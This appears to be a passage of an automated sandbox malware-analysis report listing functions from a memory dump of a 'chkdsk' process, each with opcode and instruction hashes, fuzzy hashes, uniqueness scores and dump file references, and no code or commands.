                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 73e3579f8735cee4e90c6f9a66c1abf703253ceaeaaf34304df4bdb275e773d3
                                                                                                                    • Instruction ID: 83871d7509c588316afabd91e18c60b064122d4c49fe427334e6a3794d268253
                                                                                                                    • Opcode Fuzzy Hash: 73e3579f8735cee4e90c6f9a66c1abf703253ceaeaaf34304df4bdb275e773d3
                                                                                                                    • Instruction Fuzzy Hash: B1115B78A10259EBCF04DFA9D445A9EB7B4FF08704F14845AB815EB381EA34DA02CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05885654 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                    • Instruction ID: 12a106f6579ece22084c6f5fc2bac7c6556b49bc8ce1006d4fabb5b162cd44e3
                                                                                                                    • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                    • Instruction Fuzzy Hash: A0F02D73A05214BFE31ACF5CC940F6ABBEDEB45650F05407AE901DB270E671EE05CAA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 059250B7 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81e1591a496beeb7b4af4d6ea80d0248c5e4a4cfde8f226aa6bea5d45f7af854
                                                                                                                    • Instruction ID: 320a75d53e9118f496ea9cd478ddfff953e49bd0cefad646e14a61ad08fda135
                                                                                                                    • Opcode Fuzzy Hash: 81e1591a496beeb7b4af4d6ea80d0248c5e4a4cfde8f226aa6bea5d45f7af854
                                                                                                                    • Instruction Fuzzy Hash: D9111B74A00259DFDB04DFA9D545BADFBF4BF08304F1442AAE919EB382EA34D941CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DD4A0 Relevance: .0, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4f230e655e6307b9b221c9475b45c5aeea94983b61392df8e0d825272c6658d3
                                                                                                                    • Instruction ID: adcafbc637b6959d976d87ab2d042c9509ff536f6d4e12136e7cc6cf7654bfa2
                                                                                                                    • Opcode Fuzzy Hash: 4f230e655e6307b9b221c9475b45c5aeea94983b61392df8e0d825272c6658d3
                                                                                                                    • Instruction Fuzzy Hash: D5F0C8337827806BDB3577A88D58F2A6675EBC1A44F5408A87E028B1D0CD24CC01CA51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F409 Relevance: .0, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d3a13a478aedb03c0eab925ecdde4da67dfe40dd16791779e19e32e4d81ba90
                                                                                                                    • Instruction ID: 30a9ad5e6dc24bcb2efa4b6bb75470ac6fe9aea59ae8ce76e3ecb702d1844b07
                                                                                                                    • Opcode Fuzzy Hash: 3d3a13a478aedb03c0eab925ecdde4da67dfe40dd16791779e19e32e4d81ba90
                                                                                                                    • Instruction Fuzzy Hash: 65F0A436B11318AFDB14EBB9C409AAEB7B8EF44710F00849AF911EB2C1DA74DA018751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DA130 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 147756ab8d7282d448316ffe5e1f43b55fe354e243abc9ea8f372aa7674bdb09
                                                                                                                    • Instruction ID: 8a83d4ce90d2004973b6c1643c2205d146930bb168e16f8e88063e52db56df26
                                                                                                                    • Opcode Fuzzy Hash: 147756ab8d7282d448316ffe5e1f43b55fe354e243abc9ea8f372aa7674bdb09
                                                                                                                    • Instruction Fuzzy Hash: 3B01853A111209ABCF12AE84D840EDA7FA6FB4C754F068201FE19A6220C636DD71EF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588716D Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                    • Instruction ID: 419d72cdb4fc1cdaef141fd1aeb5f6d9191bc53578b280135824a6800e133654
                                                                                                                    • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                                                                    • Instruction Fuzzy Hash: 02F0C27AB092586BEF15F7A58880FBABBB9EBC0610F1484659D03D7684D631FE4086A4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588648A Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 75e87c082eb7647647009323164f19e1de03f9522809d57488ff84e9f4711a69
                                                                                                                    • Instruction ID: 369ff4278e0f1de97ce91d51db9a6a03f12779fe5707f346030da79ba8ee4c88
                                                                                                                    • Opcode Fuzzy Hash: 75e87c082eb7647647009323164f19e1de03f9522809d57488ff84e9f4711a69
                                                                                                                    • Instruction Fuzzy Hash: 4901AD70344680DBEB26AB68CE19F393BEAFB10B14F080094BD02CB6E2EA28DC408115
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584C090 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21b0678b909cafc02f7e3d1f2e05a07aefb2a1f19ebb0c3c816ca48e718c08ab
                                                                                                                    • Instruction ID: ba6e44807e990334316fa34c4f6f97f8d28405992aa3a1292f25037b8f286712
                                                                                                                    • Opcode Fuzzy Hash: 21b0678b909cafc02f7e3d1f2e05a07aefb2a1f19ebb0c3c816ca48e718c08ab
                                                                                                                    • Instruction Fuzzy Hash: A6F0F0727493599BE324D64A8C40F327A9BE780610F24802AEF06CB291FE71DC418E55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DC51D Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0dfb14307dad9dda6dbeaa186b63b8b120f68cef0bbea57689b6b768ab944827
                                                                                                                    • Instruction ID: 910228d432fe2e0b3034a4d71b0430f8ec4730ddc1899a33eb6aac7dfefc4841
                                                                                                                    • Opcode Fuzzy Hash: 0dfb14307dad9dda6dbeaa186b63b8b120f68cef0bbea57689b6b768ab944827
                                                                                                                    • Instruction Fuzzy Hash: CDF0A4712093049FC714EF68C445A1AB7E4FF48B04F444A5AFC98DB391EA34ED00C756
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05880774 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                    • Instruction ID: ce535c5fb6dac250e7e0d45715fba5c99cd3180bc204ca3c14407a826651b977
                                                                                                                    • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                    • Instruction Fuzzy Hash: 53F0B472610604EFE324EB25CC09B66B3E9EF98750F1480789C05D71B0FAB2DD00CA15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05925149 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a8b8320904af21a7416dacb0790dec8a1d2e2a6f346646e338177ea8f8c85308
                                                                                                                    • Instruction ID: a1f56d589c384ffaaeedd008a50337a8280b3f1506ea6c89bdcbf2e728e59290
                                                                                                                    • Opcode Fuzzy Hash: a8b8320904af21a7416dacb0790dec8a1d2e2a6f346646e338177ea8f8c85308
                                                                                                                    • Instruction Fuzzy Hash: 89F04F74A01208AFDB04EFB9D549A9EB7F4FF08304F108459B805EB381EA74DE00CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DC592 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 95513c0cb6899638637b6d88464ac36686a67c242354cc816d57febd72757924
                                                                                                                    • Instruction ID: 62f21205683247c8d5835b3748c9452dd6509cf447ca900f3c0d0b80aeedaaa7
                                                                                                                    • Opcode Fuzzy Hash: 95513c0cb6899638637b6d88464ac36686a67c242354cc816d57febd72757924
                                                                                                                    • Instruction Fuzzy Hash: 81F04F74A01308AFCB04EFA9C519A5EB7F4FF18204F108059B816EB381DA74EE01CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585471B Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1abbecd36a76f11ddb5cc452e70a1db55d7717210267e8898adade286a93e767
                                                                                                                    • Instruction ID: baca054b008f5bf5e3b67a03917c18b4b4a46356ed26338d7c740af656790a0a
                                                                                                                    • Opcode Fuzzy Hash: 1abbecd36a76f11ddb5cc452e70a1db55d7717210267e8898adade286a93e767
                                                                                                                    • Instruction Fuzzy Hash: 35F09AB19166AC9FDF21C3788048FA177D9AB43676F188966DC2ACB571C324ECC8CA51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588C50D Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3328b961000f68586a18e9faac867ed3a47614851bc83ec7f785a5f24ba31728
                                                                                                                    • Instruction ID: 6388b28333a6bac5e2892243969336cd4ba93e0440fca9b1474866797e6d2729
                                                                                                                    • Opcode Fuzzy Hash: 3328b961000f68586a18e9faac867ed3a47614851bc83ec7f785a5f24ba31728
                                                                                                                    • Instruction Fuzzy Hash: 35F0BEB1515A959ADF21B66CC44CB3177D4FB42668F058165DC0ACF515C620DC88C2A4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892539 Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                    • Instruction ID: cb13fc1689b50764873009614eecd37aeda02bf4bde919570ea34cdaeaafb019
                                                                                                                    • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                    • Instruction Fuzzy Hash: C4E092323406402BDB559E598CD8F57779EAFC2710F080479BD059E182CAE29D0982A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F7CF Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82ed87a43f8ecd275400eff04ac954ac60bf0b1b638b3d8630032d05cb4b92de
                                                                                                                    • Instruction ID: b882c9fbedac15a266d399c1cc24b2cc51d2ba294d9b733a8c9f3c912b8d70bc
                                                                                                                    • Opcode Fuzzy Hash: 82ed87a43f8ecd275400eff04ac954ac60bf0b1b638b3d8630032d05cb4b92de
                                                                                                                    • Instruction Fuzzy Hash: E7F08275B01248AFDF14DBA9D55AE9E77B8AF08704F440498F902EB2C1E974DD408715
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590F717 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6b9f1c35900411f2eb139cbe89d16fc05c913467751900128585dde73a24cba3
                                                                                                                    • Instruction ID: 8ffcaa48e4ce7abf9368c35e0179b08d7eedc6b526ad4483b016a52535d39955
                                                                                                                    • Opcode Fuzzy Hash: 6b9f1c35900411f2eb139cbe89d16fc05c913467751900128585dde73a24cba3
                                                                                                                    • Instruction Fuzzy Hash: 44F08275A05248AFDF14DBB9D55AE5E77B8AF08704F040498F502EB2C1DA74DD008759
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05887128 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6a90b3364d990ff80f3d965f38fa3b654a87e7cf0793d9d5c05860f140eaa8e
                                                                                                                    • Instruction ID: 0803578effc737e99e92eed8d907be7fa475e418d317d9a59359e48fbe8aa6e9
                                                                                                                    • Opcode Fuzzy Hash: a6a90b3364d990ff80f3d965f38fa3b654a87e7cf0793d9d5c05860f140eaa8e
                                                                                                                    • Instruction Fuzzy Hash: 3AF0BE31A156A48FDF21E335C058F61BBD5BB80661F1980A8EC19C7922C234ECC0C690
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0592505B Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 149d341b228daa33dfc570e91530158acf9d725e8043dd37cca285127f68d059
                                                                                                                    • Instruction ID: a883f372435c7ed72cae98a7f7a94b9845a8368248d30ee3946c02cbfcc83061
                                                                                                                    • Opcode Fuzzy Hash: 149d341b228daa33dfc570e91530158acf9d725e8043dd37cca285127f68d059
                                                                                                                    • Instruction Fuzzy Hash: 72F08271A41248ABDF04EBB9D95AE5E77B8AF08704F144898B901EB285EA74DD008755
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588174A Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6b31f4e0523d27faa7a03ca9d914ac6e88032ef5fcceed471d9d344730a6352
                                                                                                                    • Instruction ID: 46d8c1c26d3d6a69579245386d68b4d742b0af6d1c369fe5cce0489f47b3a110
                                                                                                                    • Opcode Fuzzy Hash: a6b31f4e0523d27faa7a03ca9d914ac6e88032ef5fcceed471d9d344730a6352
                                                                                                                    • Instruction Fuzzy Hash: D9E092727018216BD321AB58AC04F76B39EEFD4650F0A0439F904D7214DA28DD02C7E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058854E0 Relevance: .0, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                    • Instruction ID: 08e9761df39d516a0b3f88c096ff5f1daace9f584d86b7dab77a8cb1397cb402
                                                                                                                    • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                    • Instruction Fuzzy Hash: CAE0ED73245615BBC721AA0ADC04F22BBAAFF80771F048629ED1993690CB70EC01CAE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05850630 Relevance: .0, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                    • Instruction ID: d0b77ccc099f11e3d7287a07d18c5277e8ae036d16046f170d67721b9e4cf125
